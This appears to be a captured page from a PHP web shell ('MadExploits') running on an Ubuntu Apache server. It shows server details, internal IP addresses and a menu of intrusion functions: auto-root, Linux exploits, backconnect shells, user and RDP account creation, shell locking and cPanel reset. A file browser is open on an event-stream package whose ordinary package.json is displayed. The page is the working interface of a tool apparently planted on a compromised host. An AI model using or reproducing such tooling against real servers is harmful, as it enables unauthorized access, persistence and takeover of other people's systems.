Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
event-stream /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxrwxr-x
test
[ DIR ]
drwxrwxr-x
.npmignore
42
B
-rw-rw-r--
.travis.yml
38
B
-rw-rw-r--
LICENCE
1.07
KB
-rw-rw-r--
index.js
7.27
KB
-rw-rw-r--
package.json
1.1
KB
-rw-rw-r--
readme.markdown
8.87
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "event-stream", "version": "3.3.4", "description": "construct pipes of streams of events", "homepage": "http://github.com/dominictarr/event-stream", "repository": { "type": "git", "url": "git://github.com/dominictarr/event-stream.git" }, "dependencies": { "through": "~2.3.1", "duplexer": "~0.1.1", "from": "~0", "map-stream": "~0.1.0", "pause-stream": "0.0.11", "split": "0.3", "stream-combiner": "~0.0.4" }, "devDependencies": { "asynct": "*", "it-is": "1", "ubelt": "~3.2.2", "stream-spec": "~0.3.5", "tape": "~2.3.0" }, "scripts": { "prepublish": "npm ls && npm test", "test": "asynct test/", "test_tap": "set -e; for t in test/*.js; do node $t; done" }, "testling": { "files": "test/*.js", "browsers": { "ie": [ 8, 9 ], "firefox": [ 13 ], "chrome": [ 20 ], "safari": [ 5.1 ], "opera": [ 12 ] } }, "license": "MIT", "author": "Dominic Tarr <dominic.tarr@gmail.com> (http://bit.ly/dominictarr)" }
Close